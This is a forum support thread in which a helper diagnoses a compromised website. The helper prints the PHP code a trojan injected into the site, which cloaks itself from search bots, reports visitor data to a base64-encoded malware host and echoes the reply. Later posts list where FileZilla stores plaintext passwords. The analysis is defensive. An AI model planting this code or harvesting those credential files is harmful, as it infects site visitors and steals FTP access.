Problems, need help? Have a tip or advice? Post it here.
13 posts Page 2 of 2
@ntoupin

Thank you for granting me access to your server's CPanel.
The reason why I requested this access was that since the incidence you reported was a very recent one, if your server was indeed compromised, the web server's access logs would contain clues about the intrusion.

As it happens, your FTP log shows clearly such activity on the 17th. of March.
IP address 72.44.80.94 logged in through your FTP credentials and made changes to several files on your server (I am PMing you a list of all such files as some of them are still present on the server).

The modified files have this piece of code injected -
Code: Select all
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)
    &&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)
    &&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)
    &&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)
    &&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){
        // Create  bot analitics
        $stCurlLink = base64_decode(
        'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMO
        TE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['
        HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET[
        'look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}

The basecoded string aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw leads up to http://adveconfirm.com/, a classified high-risk site that serves up malware (goolge for aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw and you'll find a slew of sites being affected by this trojan - most of them in the current month).

That clears up the mystery then.
Your local machine is infected and the trojan is using your FTP name/password to make modifications to PHP files on your server.
Please sanitize your machine, reset all your FTP accounts and change your FTP client.

Hope this helps. Thanks.
I've been following this post with interest - glad :) it's resolved OK - good detective work kk.

I was a bit surprised :o to read that FileZilla is not recommended because it stores passwords in plain text ... I'm using a version which doesn't do that v2.2. Obviously not good :oops: as it's way out of date. Can anybody recommend a secure and free ftp client :?:
You could try http://winscp.net/eng/index.php if you are looking for secure password management in addition to an ftp client. I still prefer FileZilla's user interface and for me it works fine as I don't use it to save passwords. Potato if you decide to switch over, make sure you delete any remnant FileZilla files.
The following files are what you need to know about:
filezilla.xml – Stores most recent server info including password in plaintext.
recentservers.xml – Stores all recent server info including password in plaintext.
sitemanager.xml – Stores all saved sites server info including password in plaintext.
These files can usually be found in the following directories:
Windows XP/2K: “C:\Documents and Settings\username\Application Data\FileZilla”
Windows Vista: “C:\Users\username\AppData\Roaming\FileZilla\”

http://unsharptech.com/2008/05/20/filez ... plaintext/
13 posts Page 2 of 2
cron